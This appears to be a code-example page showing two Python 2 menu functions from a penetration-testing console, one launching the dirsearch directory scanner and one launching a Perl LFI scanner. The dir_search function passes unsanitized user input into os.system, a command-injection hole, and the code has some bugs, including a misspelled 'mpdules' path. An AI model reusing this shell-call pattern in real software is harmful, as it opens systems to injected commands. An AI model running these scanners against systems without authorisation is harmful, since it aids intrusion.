Esempio n. 29
0
def dirse():
    while True:
        dir = raw_input("Pentest>> (" + B + "modules/post)(" + R +
                        "post/dir_search" + N + "): ")
        if dir == 'show options':
            help.option()
            dirse()
        elif dir == 'back':
            core.menu.post()

        elif dir == 'set target':
            ym = raw_input("" + N + "Pentest>> (" + B + "modules/post)(" + R +
                           "post/dir_search " + G + "(set target)" + N + "): ")
            print "target => " + R + "", ym
            puki = raw_input("Pentest>> (" + B + "modules/post)(" + R +
                             "post/dir_search " + G + "(set extensions)" + N +
                             "): ")
            dih = raw_input("" + N + "Pentest>> (" + B + "modules/post)(" + R +
                            "post/dir_search" + N + "): ")
            if dih == "run":
                os.system("python mpdules/dirsearch/dirsearch.py -u %s -e %s" %
                          (ym, puki))
                print "" + B + "[*]" + N + " Job finished!"
                print
                dirse()
            else:
                dirse()
        elif dir == 'clear':
            clean()
            dirse()
        else:
            print "Wrong Command => ", dir
            print "" + N + "" + B + "[" + R + "!" + B + "] " + N + "Please enter 'show options'"
            dirse()
        pass
Esempio n. 30
0
def lfi():
    while True:
        lf = raw_input("" + N + "Pentest>> (" + B + "modules/scanners)(" + R +
                       "scanner/lfi_scanner" + N + "): ")
        if lf == 'show options':
            help.option()
            lfi()
        elif lf == 'back':
            core.menu.scan()
        elif lf == 'set target':
            yu = raw_input("" + N + "(Pentest)> (" + B + "modules/scanners)(" +
                           R + "scanner/lfi_scanners (set target)" + N + "): ")
            print "" + B + "[*] " + N + "Starting attacks..."
            os.system("cd modules;cd lfi_scanners;perl lfi_scanner.pl")
            print "" + B + "[*]" + N + " Job finished!"
            print
            lfi()
        elif lf == 'clear':
            clean()
            lfi()
        else:
            print "Wrong Command => ", lf
            print "" + N + "" + B + "[" + R + "!" + B + "] " + N + "Please enter 'show options'"
            lfi()

        pass